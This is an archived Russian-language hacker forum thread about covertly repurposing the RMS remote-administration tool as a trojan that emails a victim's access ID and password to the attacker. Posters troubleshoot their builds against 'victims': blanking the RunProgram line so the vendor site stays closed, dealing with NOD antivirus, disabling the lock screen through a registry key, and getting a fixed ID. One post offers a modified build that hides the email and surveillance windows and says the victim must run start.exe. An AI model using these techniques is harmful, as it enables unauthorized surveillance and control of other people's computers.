1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи на хакерскую тематику", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. ParazziT

    ParazziT Новичок

    Регистрация:
    7 янв 2013
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    scandalist,
    я, конечно, нуб во всей этой вашей кухне, но... в своей инструкции вы аккуратно обошли момент настройки дополнительных параметров при выборе типа дистрибутива. Если при конфигурации сервера выбрать "стандартный" тип, то в доп.параметрах неактивен чекбокс, отвечающий за запрос подтверждения (его невозможно отключить). И конфигурация сервера не выдаёт файла rms.***
    [​IMG]
    А вот если выбрать тип "в один клик", то такая возможность появляется, но после окончания конфигурирования сервера получается файл rms.exe но никак не rms.msi
    Пока на этом я и остановился.
     
  2. IceBolt

    IceBolt Новичок

    Регистрация:
    18 окт 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Такая же хрень,только хотел спросить,но опередили...
    Стоит на удалённом компе НОД.Нормально работает билд,но скопировать файлы не могу.Ранее на версии 5.0 такой проблемы небыло,несмотря на присутствие того же нода.
    [​IMG]
     
  3. melovod

    melovod Новичок

    Регистрация:
    25 июл 2013
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Проблема решается установкой клиента версии 5.4
     
  4. IceBolt

    IceBolt Новичок

    Регистрация:
    18 окт 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    После патча версии 5.5.3 при запуске такое...
    [​IMG]
    До патча сборка работала и слала на почту ID+pass,но при старте открывается сайт+сообщение об отсылке ID+видеонаблюдение.

    Добавлено через 1 час 26 минут
    Версия 5.5.2 так же,работает (только сайт открывается)до забивания нулями строки
    Код:
    RunProgram="forcenowait:http://rmansys.ru/"
    После чего перестаёт запускаться.Что делаю не так подскажите пожалуйста.

    Добавлено через 7 минут
    ЗЫ:Понял свою ошибку.Нужно не нулями забивать,а пробелами.Заработало.Вот только камера запускается,но видео нет(в отличии от версии 5.3.1b2-в которой всё как нужно).
    А так же хотелось бы подсказки,как сделать постоянный ID и пасс?
    Что бы без отсылки на почту при каждой перезагрузке сервера,что очень не удобно.
    Спасибо заранее.
     
  5. zerorms

    zerorms Новичок

    Регистрация:
    13 июн 2013
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    есть такой пакет только с версией 5.5.3 последней?
     
  6. Blokada

    Blokada Новичок

    Регистрация:
    20 апр 2014
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    У жертвы Windows 8 два рабочих стола\монитора все функции работают кроме просмотра и управления. Никогда с Windows 8 не сталкивался. Кто знает решение буду признателен.
    [​IMG]
     
  7. 4ekkk

    4ekkk Новичок

    Регистрация:
    29 мар 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Не очень понятно, что конкретно нужно? " 2 моника и ?
     
    Последнее редактирование: 20 апр 2014
  8. A-L-I-E-N

    A-L-I-E-N Новичок

    Регистрация:
    18 мар 2011
    Сообщения:
    0
    Симпатии:
    4
    Баллы:
    0
    Не, на скрине всего один рабочий стол. Но на два моника расширенна рабочая область. Я стабильно подключался на старых версиях к WIN7 на два монитора. Думаю, здесь может быть какая-то проблема с драйверами, но по идее, они просто не могли не продумать подобный случай =) Я тогда просто вел мышку вбок до упора и картинка переползала на соседний монитор.

    Быть может в момент подключения Windows включен экран блокировки?
    Тогда его можно отключить в реестре
    Код:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\
    
    создаем раздел Personalization. В разделе Personalization создаем параметр типа DWORD с именем NoLockScreen и присваеваем значение 1
    Добавлено через 2 часа 1 минуту
    Попробуй еще с этими опциями поиграть.
    [​IMG]

    Ну и самый крайний случай, попробуй отправить на удаленный компьютер комбинацию клавиш "WIN+P" несколько раз и ENTER. Или уж совсем крайний - поискать параметр настройки нескольких дисплеев в реестре. Но я уже спать иду и врядли сейчас найду что нибудь %) Можешь попробовать "Procmon" использовать чтобы отследить изменения реестра при выборе различных параметров настройки мониторов и по аналогии исправить на удаленном компьютере.
     
    Последнее редактирование: 21 апр 2014
  9. GeForse

    GeForse Новичок

    Регистрация:
    31 июл 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Id по моему не шифруется:
    [​IMG]
    Вот пароль да
     
  10. Mr.Burns

    Mr.Burns местная мразь Продвинутый

    Регистрация:
    4 ноя 2010
    Сообщения:
    0
    Симпатии:
    24
    Баллы:
    0
    Допиленный RMS

    [​IMG]

    [​IMG]

    Не требует установки, прячет окошко отправки мыла, окошко видеонаблюдения, установка имени сервиса.
    Для настройки запустить builder.bat

    Жертва должна запустить start.exe

    Для управления жертвой нужен английский Viewer

    Благодарка ww2 за тесты и помощь. ;)

     
    Последнее редактирование: 23 июл 2014
  11. 4ekkk

    4ekkk Новичок

    Регистрация:
    29 мар 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Серьёзный хайд))

    Может хайд пониже сделать?)))
     
Статус темы:
Закрыта.

Поделиться этой страницей